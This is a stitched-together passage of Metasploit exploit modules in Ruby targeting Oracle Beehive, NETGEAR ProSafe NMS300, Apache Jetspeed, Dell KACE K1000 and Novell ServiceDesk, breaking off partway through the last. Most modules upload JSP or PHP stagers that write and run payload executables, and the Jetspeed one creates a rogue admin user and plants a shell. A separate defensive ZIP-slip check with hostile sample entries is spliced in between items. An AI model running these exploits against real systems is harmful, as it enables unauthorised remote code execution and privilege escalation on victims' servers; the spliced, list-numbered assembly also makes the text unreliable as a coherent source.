        elsif res && (res.code == 403 || res.code == 200)
          return Exploit::CheckCode::Detected
        end

        Exploit::CheckCode::Safe
      end

      def exploit
        unless check == Exploit::CheckCode::Detected
          fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet')
        end

        # Init some names
        # We will upload to:
        # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\
        exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
        stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
        print_status("Stager name is: #{stager_name}")
        print_status("Executable name is: #{exe_name}")
        register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}")

        # Ok fire!
        print_status("Uploading stager...")
        res = upload_stager(stager_name, exe_name)

        # Hmm if we fail to upload the stager, no point to continue.
        unless res
          fail_with(Failure::Unknown, 'Connection timed out.')
        end

        print_status("Uploading payload...")
        upload_payload(stager_name)
      end

      # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
      def get_jsp_stager(exe_name)
        jsp = %Q|<%@ page import="java.io.*" %>
    <%
    ByteArrayOutputStream buf = new ByteArrayOutputStream();
    BufferedReader reader = request.getReader();
    int tmp;
    while ((tmp = reader.read()) != -1) { buf.write(tmp); }
    FileOutputStream fostream = new FileOutputStream("#{exe_name}");
    buf.writeTo(fostream);
    fostream.close();
    Runtime.getRuntime().exec("#{exe_name}");
    %>|

        # Since we're sending it as a GET request, we want to keep it smaller so
        # we gsub stuff we don't want.
        jsp.gsub!("\n", '')
        jsp.gsub!(' ', ' ')

        Rex::Text.uri_encode(jsp)
      end

      def upload_stager(stager_name, exe_name)
        # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug)
        jsp_stager = get_jsp_stager(exe_name)
        uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp')
        send_request_cgi({
          'method'        => 'POST',
          'uri'           => uri,
          'encode_params' => false, # Don't encode %00 for us
          'vars_post'     => {
            'sess'       => "..\\#{stager_name}%00",
            'recxml'     => jsp_stager,
            'audiopath'  => Rex::Text.rand_text_alpha(1),
            'wavfile'    => "#{Rex::Text.rand_text_alpha(5)}.wav",
            'evaluation' => Rex::Text.rand_text_alpha(1)
          }
        })
      end

      def upload_payload(stager_name)
        uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
        send_request_cgi({
          'method' => 'POST',
          'uri'    => uri,
          'data'   => generate_payload_exe(code: payload.encoded)
        })
      end

      def print_status(msg)
        super("#{rhost}:#{rport} - #{msg}")
      end
    end
  10.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
      'Description'    => %q{
        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
        The application has a file upload vulnerability that can be exploited by an
        unauthenticated remote attacker to execute code as the SYSTEM user.
        Two servlets are vulnerable, FileUploadController (located at
        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at
        /fileUpload.do). This module exploits the latter, and has been tested with
        versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2016-1525'],
          ['US-CERT-VU', '777024'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 4 2016'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, "Application path", '/'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
      'method' => 'GET'
    })

    if res && res.code == 405
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  def generate_jsp_payload
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)
    payload_name = rand_text_alpha(rand(6)+3)

    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
      String #{var_path} = #{var_tmp}.getAbsolutePath();
      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
    } catch (Exception e) {
    }
    %>
    |

    jsp.gsub!(/[\n\t\r]/, '')
    return jsp
  end

  def exploit
    jsp_payload = generate_jsp_payload
    jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
    jsp_full_name = "null#{jsp_name}.jsp"

    post_data = Rex::MIME::Message.new
    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
    post_data.add_part(jsp_payload, "application/octet-stream", 'binary',
      "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })
    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
      print_status("#{peer} - Payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
      'method' => 'GET'
    })

    handler
  end
end
  11. Hacking

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Jetspeed Arbitrary File Upload',
      'Description'    => %q{
        This module exploits the unsecured User Manager REST API and a ZIP file
        path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier
        versions, to upload and execute a shell.

        Note: this exploit will create, use, and then delete a new admin user.

        Warning: in testing, exploiting the file upload clobbered the web
        interface beyond repair. No workaround has been found yet. Use this
        module at your own risk. No check will be implemented.
      },
      'Author'         => [
        'Andreas Lindh', # Vulnerability discovery
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2016-0710'],
        ['CVE', '2016-0709'],
        ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
      ],
      'DisclosureDate' => 'Mar 6 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux', 'win'],
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],
        ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      Opt::RPORT(8080)
    ])
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_warning(msg='')
    super("#{peer} - #{msg}")
  end

  def exploit
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user

    # This was originally a typo... but we're having so much fun!
    print_status('Kenny Loggins in')
    kenny_loggins
    print_warning('You have entered the Danger Zone')

    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip

    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
    exec_jsp_shell
  end

  def cleanup
    print_status("Deleting user: #{username}")
    delete_user
    super
  end

  #
  # Exploit methods
  #

  def create_admin_user
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => '/jetspeed/services/usermanager/users',
      'vars_post' => {
        'name'             => username,
        'password'         => password,
        'password_confirm' => password
      }
    )

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/jetspeed/services/usermanager/users/#{username}",
      'vars_post' => {
        'user_enabled' => 'true',
        'roles'        => 'admin'
      }
    )
  end

  def kenny_loggins
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/login/redirector'
    )

    res = send_request_cgi!(
      'method'    => 'POST',
      'uri'       => '/jetspeed/login/j_security_check',
      'cookie'    => res.get_cookies,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password
      }
    )

    @cookie = res.get_cookies
  end

  # Let's pretend we're mechanize
  def import_file
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/portal/Administrative/site.psml',
      'cookie' => @cookie
    )

    html = res.get_html_document
    import_export = html.at('//a[*//text() = "Import/Export"]/@href')

    res = send_request_cgi!(
      'method' => 'POST',
      'uri'    => import_export,
      'cookie' => @cookie
    )

    html = res.get_html_document
    html.at('//form[*//text() = "Import File"]/@action')
  end

  def upload_payload_zip
    zip = Rex::Zip::Archive.new
    zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)

    mime = Rex::MIME::Message.new
    mime.add_part(zip.pack, 'application/zip', 'binary',
      %Q{form-data; name="fileInput"; filename="#{zip_filename}"})
    mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
    mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')

    case target['Platform']
    when 'linux'
      register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
      register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
    when 'win'
      register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
      register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
    end

    send_request_cgi(
      'method' => 'POST',
      'uri'    => import_file,
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'cookie' => @cookie,
      'data'   => mime.to_s
    )
  end

  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/jetspeed/#{jsp_filename}",
      'cookie' => @cookie
    )
  end

  #
  # Cleanup methods
  #

  def delete_user
    send_request_cgi(
      'method' => 'DELETE',
      'uri'    => "/jetspeed/services/usermanager/users/#{username}"
    )
  end

  # XXX: This is a hack because FileDropper doesn't delete directories
  def on_new_session(session)
    super

    case target['Platform']
    when 'linux'
      print_status("Deleting user temp directory: ../temp/#{username}")
      session.shell_command_token("rm -rf ../temp/#{username}")
    when 'win'
      print_status("Deleting user temp directory: ..\\temp\\#{username}")
      session.shell_command_token("rd /s /q ..\\temp\\#{username}")
    end
  end

  #
  # Utility methods
  #

  def username
    @username ||= Rex::Text.rand_text_alpha_lower(8)
  end

  def password
    @password ||= Rex::Text.rand_text_alphanumeric(8)
  end

  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end

  def zip_filename
    @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
  end

end
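The Jetspeed module above works because the import routine writes ZIP entries wherever their names point: `zip.add_file("../../webapps/jetspeed/#{jsp_filename}", ...)` lands the JSP two levels above the per-user temp directory, inside the deployed webapp. The following is an added example, not Jetspeed's code or the module's: the containment check an archive importer needs so that such an entry is refused. Entries are modelled as `[name, data]` pairs (a constructed sample, no ZIP library) so it runs offline; a real importer would feed it the names read from the central directory.

```ruby
require 'fileutils'
require 'tmpdir'

# Added example, not code from Apache Jetspeed or from the Metasploit module.

class ZipSlipError < StandardError; end

# Resolve an entry name against dest and refuse anything that escapes it.
# Returns the absolute path the entry may be written to.
def safe_entry_path(dest, name)
  root = File.expand_path(dest)
  # ZIP names are "/"-separated, but Windows extractors also honour "\";
  # normalise both so "..\\..\\webapps\\..." is caught too.
  rel = name.gsub("\\", "/")
  if rel.start_with?('/') || rel =~ /\A[A-Za-z]:/
    raise ZipSlipError, "absolute entry name: #{name}"
  end
  # A NUL truncates the name in C-level file APIs of some extractors.
  raise ZipSlipError, "NUL byte in entry name: #{name.inspect}" if rel.include?("\0")
  full = File.expand_path(rel, root)
  # expand_path collapses "a/../../b"; the result must still sit under root.
  unless full == root || full.start_with?(root + File::SEPARATOR)
    raise ZipSlipError, "entry escapes destination: #{name}"
  end
  full
end

# Extract [name, data] entries into dest, skipping (and reporting) unsafe
# ones instead of writing them. Returns [written_paths, rejected_names].
def extract_entries(dest, entries)
  written = []
  rejected = []
  entries.each do |name, data|
    begin
      path = safe_entry_path(dest, name)
    rescue ZipSlipError
      rejected << name
      next
    end
    if name.end_with?('/')        # directory entry
      FileUtils.mkdir_p(path)
    else
      FileUtils.mkdir_p(File.dirname(path))
      File.binwrite(path, data)
    end
    written << path
  end
  [written, rejected]
end

# Constructed sample archive: one benign page plus the traversal entry the
# module creates, its backslash twin, and an absolute path.
SAMPLE_ENTRIES = [
  ['site/pages/default.psml', '<page/>'],
  ['../../webapps/jetspeed/shell.jsp', '<% Runtime.getRuntime().exec(request.getParameter("c")); %>'],
  ['..\\..\\webapps\\jetspeed\\shell2.jsp', '<% %>'],
  ['/etc/cron.d/evil', '* * * * * root id'],
]

if __FILE__ == $0
  Dir.mktmpdir('import') do |dir|
    written, rejected = extract_entries(File.join(dir, 'temp', 'user1'), SAMPLE_ENTRIES)
    puts "written:  #{written.inspect}"
    puts "rejected: #{rejected.inspect}"
  end
end
```

Only `site/pages/default.psml` is written; the three hostile names are reported and never touch the filesystem. The check is done on the resolved absolute path rather than by searching for `..`, so names like `a/b/../c` that stay inside the destination are still accepted.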
  12. Hacking

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell KACE K1000 File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in Kace K1000
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
        which allows unauthenticated users to execute arbitrary commands
        under the context of the 'www' user.

        This module also abuses the 'KSudoClient::RunCommandWait' function
        to gain root privileges.

        This module has been tested successfully with Dell KACE K1000 version 5.3.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => 'unix', # FreeBSD
      'Arch'           => ARCH_CMD,
      'Author'         =>
        [
          'Bradley Austin (steponequit)',        # Initial discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DisclosureDate' => 'Mar 7 2014'))
  end

  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))

    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'
      if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/
        vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")
        if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3
          return Exploit::CheckCode::Vulnerable
        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849
          return Exploit::CheckCode::Vulnerable
        elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547
          return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
      end
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # upload payload
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
    payload_path = "/kbox/kboxwww/tmp/"
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")
    res = send_request_cgi(
      'uri'      => normalize_uri('service', 'kbot_upload.php'),
      'method'   => 'POST',
      'vars_get' => Hash[{
        'filename'         => fname,
        'machineId'        => "#{'../' * (rand(5) + 4)}#{payload_path}",
        'checksum'         => 'SCRAMBLE',
        'mac'              => rand_text_alphanumeric(rand(8) + 5),
        'kbotId'           => rand_text_alphanumeric(rand(8) + 5),
        'version'          => rand_text_alphanumeric(rand(8) + 5),
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5)
      }.to_a.shuffle],
      'data'     => post_data)

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Payload uploaded successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
    end

    # execute payload
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Payload executed successfully')
    elsif res.code && res.code == 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end
  13.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell ServiceDesk Authenticated File Upload',
      'Description'    => %q{
        This module exploits an authenticated arbitrary file upload via directory
        traversal to execute code on the target. It has been tested on versions 6.5
        and 7.1.0, in Windows and Linux installations of Novell ServiceDesk, as well
        as the Virtual Appliance provided by Novell.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2016-1593' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
          [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ]
        ],
      'Platform'       => %w{ linux win },
      'Arch'           => ARCH_X86,
      'DefaultOptions' => { 'WfsDelay' => 15 },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Novell ServiceDesk / Linux',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_X86
            }
          ],
          [ 'Novell ServiceDesk / Windows',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
        ],
      'Privileged'     => false, # Privileged on Windows but not on (most) Linux targets
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 30 2016'
    ))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 80]),
        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
        OptString.new('TRAVERSAL_PATH', [false, 'Traversal path to tomcat/webapps/LiveTime/'])
      ], self.class)
  end

  def get_version
    res = send_request_cgi({
      'uri'     => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
      'method'  => 'GET',
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      }
    })

    if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
      return $1.to_f
    else
      return 999
    end
  end

  def check
    version = get_version
    if version <= 7.1 && version >= 6.5
      return Exploit::CheckCode::Appears
    elsif version > 7.1
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def pick_target
    return target if target.name != 'Automatic'

    print_status("#{peer} - Determining target")
    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}

    traversal_paths = []
    if datastore['TRAVERSAL_PATH']
      traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path
    end
    # add Virtual Appliance path plus the traversal in a Windows or Linux self install
    traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/'])

    # test each path to determine OS (and correct path)
    traversal_paths.each do |traversal_path|
      jsp_name = upload_jsp(traversal_path, os_finder_payload)
      res = send_request_cgi({
        'uri'     => normalize_uri('LiveTime', jsp_name),
        'method'  => 'GET',
        'headers' => {
          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
        },
        'cookie'  => @cookies
      })

      if res && res.code == 200
        if res.body.to_s =~ /Windows/
          @my_target = targets[2]
        else
          # Linux here
          @my_target = targets[1]
        end
        if traversal_path.include? '/srv/tomcat6/webapps/'
          register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
        else
          register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
        end
        return traversal_path
      end
    end

    return nil
  end

  def upload_jsp(traversal_path, jsp)
    jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp"

    post_data = Rex::MIME::Message.new
    post_data.add_part(jsp, "application/octet-stream", 'binary',
      "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
    data = post_data.to_s

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(@upload_url),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie'  => @cookies,
      'data'    => data,
      'ctype'   => "multipart/form-data; boundary=#{post_data.bound}"
    })

    if not res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...")
    else
      return jsp_name
    end
  end

  def create_jsp
    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
    exe = generate_payload_exe(opts)
    base64_exe = Rex::Text.encode_base64(exe)

    native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

    var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_buf     = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_tmp     = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
    var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)

    if @my_target['Platform'] == 'linux'
      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
      chmod = %Q|
      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
      Thread.sleep(200);
      |

      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
      cleanup = %Q|
      Thread.sleep(200);
      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
      |
    else
      chmod = ''
      cleanup = ''
    end

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
      String #{var_path} = #{var_tmp}.getAbsolutePath();
      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      #{chmod}
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    jsp = jsp.gsub(/\n/, '')
    jsp = jsp.gsub(/\t/, '')
    jsp = jsp.gsub(/\x0d\x0a/, "")
    jsp = jsp.gsub(/\x0a/, "")

    return jsp
  end

  def exploit
    version = get_version

    # 1: get the cookies, the login_url and the password_form and username form names (they vary between versions)
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      }
    })

    if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
      login_url = $2
      @cookies = res.get_cookies
      if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
        password_form = $1
      else
        # we shouldn't hit this condition at all, this is default for v7+
        password_form = 'password'
      end
      if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
        username_form = $1
      else
        # we shouldn't hit this condition at all, this is default for v7+
        username_form = 'username'
      end
    else
      fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.")
    end

    # 2: authenticate and get the import_url
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(login_url),
      'headers'   => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie'    => @cookies,
      'vars_post' => {
        username_form => datastore['USERNAME'],
        password_form => datastore['PASSWORD'],
        'ButtonLogin' => 'Login'
      }
    })

    if res && res.code == 200 &&
      (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ ||   # v7 and above
       res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)      # v6.5
      import_url = $1
    else
      # hmm either the password is wrong or someone else is using "our" account...
      # let's try to boot him out
      if res && res.code == 200 &&
        res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ &&
        res.body.to_s =~ /This account is in use on another system/
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => normalize_uri(login_url),
          'headers'   => {
            'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
          },
          'cookie'    => @cookies,
          'vars_post' => {
            username_form => datastore['USERNAME'],
            password_form => datastore['PASSWORD'],
            'ButtonLoginOverride' => 'Login'
          }
        })
        if res && res.code == 200 &&
          (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ ||   # v7 and above
           res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)      # v6.5
          import_url = $1
        else
          fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
      end
    end

    # 3: get the upload_url
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(import_url),
      'headers'   => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      },
      'cookie'    => @cookies,
      'vars_post' => {
        'ButtonImport' => 'Import'
      }
    })

    if res && res.code == 200 &&
      (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ ||                          # v7 and above
       res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/)  # v6.5
      @upload_url = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.")
    end

    if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/
      @upload_form = $1
    else
      # go with the default for 7.1.0, might not work with other versions...
      @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"
    end

    # 4: target selection
    @my_target = nil
    # pick_target returns the traversal_path and sets @my_target
    traversal_path = pick_target
    if @my_target.nil?
      fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
    else
      print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}")
    end

    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
